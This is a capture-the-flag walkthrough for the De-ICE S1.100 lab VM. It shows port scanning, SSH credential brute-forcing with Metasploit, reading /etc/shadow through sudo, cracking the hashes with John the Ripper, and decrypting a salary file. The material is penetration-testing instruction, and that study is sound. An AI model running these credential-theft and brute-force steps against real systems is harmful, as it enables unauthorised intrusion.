While digging though an old external drive I found the De-ICE LiveCD’s and walkthrough text files I had put together a few years ago. They are really simple; each one is a link to download the ISO, some non-spoiler information to get started, and spoilers on the off chance that you get stuck on some part of the challenge.
Personally, I learned a lot about post exploitation from some of the challenges in De-ICE. All of the spoilers are in the walkthrough as not to ruin the pen testing fun. The De-ICE S1.100 was the first capture the flag type challenge that I ever did. I think I got it from a 2600 Magazine, so it holds a special place in my heart. I would have actually done this initially using BackTrack or PHLAK; PHALK still has the best Tux logo of any distro, RIP PHALK. I lost my original notes so this one is brand new, instead of a few years old like the other versions will be. Have fun and hopefully these are helpful.
Scenario: The scenario for this LiveCD is that a CEO of a small company has been pressured by the Board of Directors to have a penetration test done within the company. The CEO, believing his company is secure, feels this is a huge waste of money, especially since he already has a company scan their network for vulnerabilities. To make the BoD happy, he decides to hire you for a 5-day job; and because he really doesn’t believe the company is insecure, he has contracted you to look at only one server – a old system that only has a web-based list of the company’s contact information. The CEO expects you to prove that the admins of the box follow all proper accepted security practices, and that you will not be able to obtain access to the box. Prove to him that a full penetration test of their entire corporation would be the best way to ensure his company is actually following best security practices.
Download Link: http://hackingdojo.com/downloads/iso/De-ICE_S1.100.iso
Default IP 192.168.1.100
1. Create list of open ports
2. Create a list of possible user names
3. Gain access to the file system
4. Elevate to root privileges
5. Discover root password
6. Find sensitive data on the operating system
Spoilers and Walkthrough
I usually start all assessments out with a port scan. This gives me at least an idea of where to start on a black box test. Since I am running this in a local VMWare environment speed isn’t an issue so -T5 it is. I also what to do OS detection and service enumeration so I’m using -A.
nmap -A -p 0-65535 -T5 192.168.1.100Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-05 20:59 EDT Nmap scan report for caps-dh841pm1(192.168.1.100) Host is up (0.00025s latency). Not shown: 65528 filtered ports PORT STATE SERVICE VERSION 20/tcp closed ftp-data 21/tcp open ftp vsftpd (broken: could not bind listening IPv4 socket) 22/tcp open ssh OpenSSH 4.3 (protocol 1.99) | ssh-hostkey: | 2048 83:4f:8b:e9:ea:84:20:0d:3d:11:2b:f0:90:ca:79:1c (RSA1) | 2048 6f:db:a5:12:68:cd:ad:a9:9c:cd:1e:7b:97:1a:4c:9f (DSA) |_ 2048 ab:ab:a8:ad:a2:f2:fd:c2:6f:05:99:69:40:54:ec:10 (RSA) |_sshv1: Server supports SSHv1 25/tcp open smtp Sendmail 8.13.7/8.13.7 | smtp-commands: slax.example.net Hello [192.168.1.128], pleased to meet you, ENHANCEDSTATUSCODES, PIPELINING, 8BITMIME, SIZE, DSN, ETRN, AUTH DIGEST-MD5 CRAM-MD5, DELIVERBY, HELP, |_ 2.0.0 This is sendmail version 8.13.7 2.0.0 Topics: 2.0.0 HELO EHLO MAIL RCPT DATA 2.0.0 RSET NOOP QUIT HELP VRFY 2.0.0 EXPN VERB ETRN DSN AUTH 2.0.0 STARTTLS 2.0.0 For more info use "HELP <topic>". 2.0.0 To report bugs in the implementation see 2.0.0 http://www.sendmail.org/email-addresses.html 2.0.0 For local information send email to Postmaster at your site. 2.0.0 End of HELP info 80/tcp open http Apache httpd 2.0.55 ((Unix) PHP/5.1.2) |_http-server-header: Apache/2.0.55 (Unix) PHP/5.1.2 |_http-title: Site doesn't have a title (text/html). 110/tcp open pop3 Openwall popa3d 143/tcp open imap UW imapd 2004.357 |_imap-capabilities: UNSELECT LOGIN-REFERRALS MAILBOX-REFERRALS LITERAL+ THREAD=REFERENCES NAMESPACE completed IDLE SASL-IR CAPABILITY OK AUTH=LOGINA0001 BINARY IMAP4REV1 STARTTLS MULTIAPPEND SCAN THREAD=ORDEREDSUBJECT SORT 443/tcp closed https MAC Address: 00:0C:29:1F:C6:F0 (VMware) Device type: general purpose Running: Linux 2.6.X OS CPE: cpe:/o:linux:linux_kernel:2.6 OS details: Linux 2.6.13 - 2.6.32 Network Distance: 1 hop Service Info: Hosts: slax.example.net, isr-l2g99xz1; OS: Unix TRACEROUTE HOP RTT ADDRESS 1 0.25 ms caps-dh841pm1 (192.168.1.100) OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 79.09 seconds
To start out I always by looking for low hanging fruit. Since the FTP service looks to be broken, based on the Nmap scan results we will look at the Apache website listening on port 80. From the website there are ten possible users.
This is where it helps to have either been a sys admin or worked at a few different companies. The two most common username conventions I have encountered are <first>.<last>, <first initial><last>. I’ve also had <employee ID>, <first><last initial>, and worst of all <first 4 of last><first 3 of first>. Because the email addresses are <last><first initial> we will use that and also add root to the list because we know it is a Slax Linux host.
I’ll use metasploit to do the initial check for weak SSH passwords. You can set your options differently this is just a simple test.
msfconsole use auxiliary/scanner/ssh/ssh_login set BLANK_PASSWORDS true set RHOSTS 192.168.1.100 set THREADS 4 set USER_FILE /root/Desktop/de-iceUsers.txt set USER_AS_PASS true
Look at that! There is nothing better than a shell and you will never forget the first one you get. Mine was a unpatched BIND 9 DNS server.
[+] SSH - Success: 'bbanter:bbanter' 'uid=1001(bbanter) gid=100(users) groups=100(users) Linux slax 2.6.16 #95 Wed May 17 10:16:21 GMT 2006 i686 pentium2 i386 GNU/Linux ' ssh firstname.lastname@example.org email@example.com's password: Linux 2.6.16. bbanter@slax:~$ who bbanter pts/0 Apr 12 14:06 (192.168.1.128)
We only have access to the users group right now so lets see if we can elevate our access manually.
bbanter@slax:~$ cat /etc/group root::0:root bin::1:root,bin,daemon daemon::2:root,bin,daemon sys::3:root,bin,adm adm::4:root,adm,daemon tty::5: disk::6:root,adm lp::7:lp mem::8: kmem::9: wheel::10:root floppy::11:root mail::12:mail news::13:news uucp::14:uucp man::15: audio::17: video::18: cdrom::19: games::20: slocate::21: utmp::22: smmsp::25:smmsp mysql::27: rpc::32: sshd::33:sshd gdm::42: shadow::43: ftp::50: pop::90:pop scanner::93: nobody::98:nobody nogroup::99: users::100: console::101:bbanter@slax:~$ cat /etc/passwd root:x:0:0:DO NOT CHANGE PASSWORD - WILL BREAK FTP ENCRYPTION:/root:/bin/bash bin:x:1:1:bin:/bin: daemon:x:2:2:daemon:/sbin: adm:x:3:4:adm:/var/log: lp:x:4:7:lp:/var/spool/lpd: sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/: news:x:9:13:news:/usr/lib/news: uucp:x:10:14:uucp:/var/spool/uucppublic: operator:x:11:0:operator:/root:/bin/bash games:x:12:100:games:/usr/games: ftp:x:14:50::/home/ftp: smmsp:x:25:25:smmsp:/var/spool/clientmqueue: mysql:x:27:27:MySQL:/var/lib/mysql:/bin/bash rpc:x:32:32:RPC portmap user:/:/bin/false sshd:x:33:33:sshd:/: gdm:x:42:42:GDM:/var/state/gdm:/bin/bash pop:x:90:90:POP:/: nobody:x:99:99:nobody:/: aadams:x:1000:10:,,,:/home/aadams:/bin/bash bbanter:x:1001:100:,,,:/home/bbanter:/bin/bash ccoffee:x:1002:100:,,,:/home/ccoffee:/bin/bash
The wheel group is our best bet since in Linux and Unix systems it allows users to run the su command. aadams is a member of the wheel group so we will try to brute force that password, again using metasploit.
set PASS_FILE /usr/share/wordlists/rockyou.txt set STOP_ON_SUCCESS true set THREADS 128 set USERNAME aadams set VERBOSE false run ****TIME PASSES**** [*] SSH - Starting bruteforce [+] SSH - Success: 'aadams:nostradamus' 'uid=1000(aadams) gid=10(wheel) groups=10(wheel) Linux slax 2.6.16 #95 Wed May 17 10:16:21 GMT 2006 i686 pentium2 i386 GNU/Linux
We will use the new set of credentials to once again SSH to the system.
aadams@slax:~$ sudo -l We trust you have received the usual lecture from the local System Administrator. It usually boils down to these three things: #1) Respect the privacy of others. #2) Think before you type. #3) With great power comes great responsibility. Password: User aadams may run the following commands on this host: (root) NOEXEC: /bin/ls (root) NOEXEC: /usr/bin/cat (root) NOEXEC: /usr/bin/more (root) NOEXEC: !/usr/bin/su *root* aadams@slax:~$ sudo cat /etc/shadow Password: root:$1$TOi0HE5n$j3obHaAlUdMbHQnJ4Y5Dq0:13553:0::::: bin:*:9797:0::::: daemon:*:9797:0::::: adm:*:9797:0::::: lp:*:9797:0::::: sync:*:9797:0::::: shutdown:*:9797:0::::: halt:*:9797:0::::: mail:*:9797:0::::: news:*:9797:0::::: uucp:*:9797:0::::: operator:*:9797:0::::: games:*:9797:0::::: ftp:*:9797:0::::: smmsp:*:9797:0::::: mysql:*:9797:0::::: rpc:*:9797:0::::: sshd:*:9797:0::::: gdm:*:9797:0::::: pop:*:9797:0::::: nobody:*:9797:0::::: aadams:$1$6cP/ya8m$2CNF8mE.ONyQipxlwjp8P1:13550:0:99999:7::: bbanter:$1$hl312g8m$Cf9v9OoRN062STzYiWDTh1:13550:0:99999:7::: ccoffee:$1$nsHnABm3$OHraCR9ro.idCMtEiFPPA.:13550:0:99999:7:::
John the Ripper can directly attach shadow files so lets try it using the rockyou wordlist. The first one runs a simple set of rules to look for easy passwords, basically so you don’t have to find bbanter again.
john --signle deiceShadow.txt john --wordlist=/usr/share/wordlists/rockyou.txt de-iceShadow.txt root:tarot:13553:0::::: aadams:nostradamus:13550:0:99999:7::: bbanter:bbanter:13550:0:99999:7::: ccoffee:hierophant:13550:0:99999:7::: su -
Now that we are root on the system lets look for sensitive data on the system.
root@slax:/home# ls aadams/ bbanter/ ccoffee/ ftp/ root@slax:/home# cd ccoffee root@slax:/home/ccoffee# ls root@slax:/home/ccoffee# cd ../ftp root@slax:/home/ftp# ls incoming/ root@slax:/home/ftp# cd incoming/ root@slax:/home/ftp/incoming# ls salary_dec2003.csv.enc*
Huh, .enc, google that I bet salary information isn’t supposed to be there. Running strings definitely doesn’t produce readable results.
root@slax:/home/ftp/incoming# strings salary_dec2003.csv.enc | head -10 Salted__n Lw$A` YN>7 #ki8 /><b Wm&/ KU'M R|T& @/CP/ 0"Kt
But try googling the Salted__n and see if you can figure out what we might need to do. First, we need to remember the /etc/passwd entry that noted changing the root password would break encryption and second after some research we know that it is encrypted using OpenSSL.
root@slax:/home/ftp/incoming# openssl aes-128-cbc -d -in salary_dec2003.csv.enc -out salary_dec2003.csv enter aes-128-cbc decryption password: root@slax:/home/ftp/incoming# strings salary_dec2003.csv | head -10
That is certainly sensitive data! We’ve got all the flag, time to call it a day.